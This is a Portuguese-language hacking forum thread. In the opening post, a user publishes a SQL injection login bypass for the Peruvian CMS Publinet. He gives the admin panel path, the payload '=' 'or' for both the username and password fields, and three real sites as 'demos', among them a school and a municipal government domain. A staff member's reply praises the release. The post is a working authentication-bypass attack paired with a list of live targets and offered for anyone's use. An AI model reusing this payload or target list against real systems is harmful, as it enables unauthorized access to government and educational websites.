CMS | Publinet - SQL Injection POST

Post Reply
User avatar
Malokin_
Expert
Posts: 1
Joined: Sat Nov 17, 2018 8:32 pm
x 1
x 1

CMS | Publinet - SQL Injection POST

Post by Malokin_ » Sat Nov 17, 2018 10:36 pm

Olá sou Malokin_, integrante da PRdV Team, hoje vou lançar aqui pra vocês um CMS Peruano, vulnerável a SQL Injection POST ( formulários )
- Falha no CMS descoberta por Malokin_ !

CMS : https://www.publinet.com.pe/

[#] URL Painel Administrativo : /panel/
PoC :
usuário : '=' 'or'
senha : '=' 'or'

Referência Sobre bypass em forms de login, manipulando o SQL Query, caso queiram entender mais a fundo do assunto : http://www.securityidiots.com/Web-Pente ... ction.html

DEMOS :
https://www.imamgelcaballero.edu.pe/panel/
https://www.indeesac.com/panel/
https://www.muniyuracmarca.gob.pe/panel/

Me Siga no Twitter - @MalokinSecurity
1 x

User avatar
Plastyne
Staff
Posts: 12
Joined: Sat Nov 17, 2018 7:46 pm
x 11
x 12

Re: CMS | Publinet - SQL Injection POST

Post by Plastyne » Sun Nov 18, 2018 3:42 am

Ótimo conteúdo, parabéns e obrigado por compartilhar as informações com todos os usuários do fórum.
1 x
O que você sabe não tem valor, o valor está no que você faz com o que sabe.

- Bruce Lee

Post Reply